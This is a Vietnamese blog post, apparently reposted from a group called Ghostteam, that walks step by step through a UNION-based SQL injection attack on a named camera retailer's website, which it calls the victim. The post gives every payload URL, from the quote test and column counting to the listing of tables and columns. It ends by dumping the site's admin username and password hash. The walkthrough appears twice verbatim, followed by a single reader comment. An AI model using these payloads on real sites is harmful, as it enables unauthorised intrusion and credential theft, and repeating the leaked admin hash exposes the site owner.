Bài liên quan
Victim đơn giản nhé : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101.html
Để xác định lỗi ta phải thêm dấu ‘ vào trước .html->> thành ra thế này : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′.html
Sau đó xác định số column : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ order by 1– -.html ->> Bình Thường
www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ order by 5– -.html –>> Bình thường
www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ order by 11– -.html ->> Lỗi
+Union Select như bình thường: www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ union select 1,2,3,4,5,6,7,8,9,10– -.html –>> Nó bình thường và không hiện số cột bị lỗi.
+Vì thế chúng ta sẽ thay 1101 = null sẽ được như thế này : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,10– -.html –>> Đã hiện Ở đây mình xin đc chọn số 10 cho dễ nhìn.Còn số mấy tùy các bạn.
+Khai thác table : http://www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,group_concat(table_name) from information_schema.tables where table_schema=database()– -.html
-Ta sẽ được : dichvu,gallery,giaiphap,gioithieu,hotro,info,khachhang,khuyenmai,loaisp,sanpham,thuonghieu,tintuc,user,yahoo
+Chú ý phần user và khai thác tiếp column : http://www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0×75736572– -.html (75736572 là mã HEX của user)
-Ta sẽ được : username,password
Và cuối cùng get data : http://www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,group_concat(username,0x7c,password,0x7c) from user– -.html
-Ta được : quantri|dbd0483abac074a299f515ae7451b59a|
End.
Nguồn Ghostteam
Để xác định lỗi ta phải thêm dấu ‘ vào trước .html->> thành ra thế này : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′.html
Sau đó xác định số column : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ order by 1– -.html ->> Bình Thường
www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ order by 5– -.html –>> Bình thường
www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ order by 11– -.html ->> Lỗi
+Union Select như bình thường: www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ union select 1,2,3,4,5,6,7,8,9,10– -.html –>> Nó bình thường và không hiện số cột bị lỗi.
+Vì thế chúng ta sẽ thay 1101 = null sẽ được như thế này : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,10– -.html –>> Đã hiện Ở đây mình xin đc chọn số 10 cho dễ nhìn.Còn số mấy tùy các bạn.
+Khai thác table : http://www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,group_concat(table_name) from information_schema.tables where table_schema=database()– -.html
-Ta sẽ được : dichvu,gallery,giaiphap,gioithieu,hotro,info,khachhang,khuyenmai,loaisp,sanpham,thuonghieu,tintuc,user,yahoo
+Chú ý phần user và khai thác tiếp column : http://www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0×75736572– -.html (75736572 là mã HEX của user)
-Ta sẽ được : username,password
Và cuối cùng get data : http://www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,group_concat(username,0x7c,password,0x7c) from user– -.html
-Ta được : quantri|dbd0483abac074a299f515ae7451b59a|
End.
Nguồn Ghostteam
Có bao nhiêu dạng vậy a
ReplyDelete